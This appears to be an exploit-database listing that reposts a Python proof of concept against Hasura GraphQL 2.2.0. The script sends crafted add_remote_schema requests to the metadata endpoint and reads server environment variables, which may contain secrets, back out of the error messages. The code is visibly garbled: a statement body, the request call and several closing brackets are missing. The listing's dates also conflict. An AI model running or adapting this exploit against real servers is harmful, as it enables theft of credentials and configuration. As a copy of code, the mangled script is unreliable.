Hasura GraphQL 2.2.0 Information Disclosure

CVE Category Price Severity
CVE-2021-3271 CWE-200 Not specified Medium
Author Risk Exploitation Type Date
Unknown High Remote 2022-03-12
Our sensors found this exploit at:

Below is a copy:

Hasura GraphQL 2.2.0 Information Disclosure
# Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure
# Software: Hasura GraphQL Community
# Software Link:
# Version: 2.2.0
# Exploit Author: Dolev Farhi
# Date: 5/05/2022
# Tested on: Ubuntu

import requests

SERVER_ADDR = 'x.x.x.x'

url = 'http://{}/v1/metadata'.format(SERVER_ADDR)

print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read')

while True:
    env_var = input('Type environment variable key to leak.\n> ')
    if not env_var:

    payload = {
    "type": "bulk",
    "source": "",
    "args": [
            "type": "add_remote_schema",
            "args": {
                "name": "ttt",
                "definition": {
                    "timeout_seconds": 60,
                    "forward_client_headers": False,
                    "headers": [],
                    "url_from_env": env_var
                "comment": ""
    "resource_version": 2
    r =, json=payload)
       print(r.json()['error'].split('not a valid URI:')[1])
    except IndexError:
        print('Could not parse out VAR, dumping error as is')
        print(r.json().get('error', 'N/A'))

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum